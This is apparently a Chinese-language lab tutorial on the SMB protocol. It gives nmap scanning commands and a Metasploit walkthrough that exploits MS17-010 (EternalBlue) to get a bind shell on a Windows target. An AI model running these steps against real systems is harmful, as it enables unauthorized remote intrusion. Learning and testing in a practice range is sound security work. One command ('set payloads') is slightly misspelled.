SMB(Server Message Block) 通信协议是微软(Microsoft)和因特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通信协议(客户端和服务器交互)。后来Linux移植了SMB,并称为samba.
SMB协议是基于TCP-NETBIOS下的,一般端口使用为139,445
SMB协议,计算机可以访问网络资源,下载对应的资源文件。
nmap 扫描查看开放的服务 看看有没有445或者139端口的服务
- nmap -sV IP 挖掘开放服务信息
- nmap -A -v -T4 IP 挖掘靶场全部信息 -A 全部信息 -v详细信息 -T4允许最大线程
-nmap -sS -Pn IP 其中 -sS表示使用TCP SYN进行扫描,-Pn表示不是用Ping进行主机检测。
Metasploit 开源的安全漏洞检测工具
启动工具命令 msfconsole
搜索模块命令 search ms17-010(可以自己开发模块并添加到msf中直接使用)
利用模块命令 use exploit/windows/smb/ms17_010eternalblue
设置目标主机命令 set rhost IP
Show options
参数options是保证metasploit框架中各个模块正常运行所需的各种设置,当你选择一个模块,并输入msf>show options后,会列出这个模块所需的各种参数。如果没有选择任何模块,输入这个命令会显示所有的全局参数。
Show payloads(显示合适的payload反弹shell。reverse_tcp(反弹时tcp)
攻击载荷是针对特定平台的一段攻击代码,它通过网络传送到攻击目标进行执行。和show options命令一样,当你在当前模块的命令提示符下输入show payloads,metasploit会将当前模块兼容的攻击载荷显示出来。
Set payloads
-set payloads generic/shell_bind_tcp
-exploit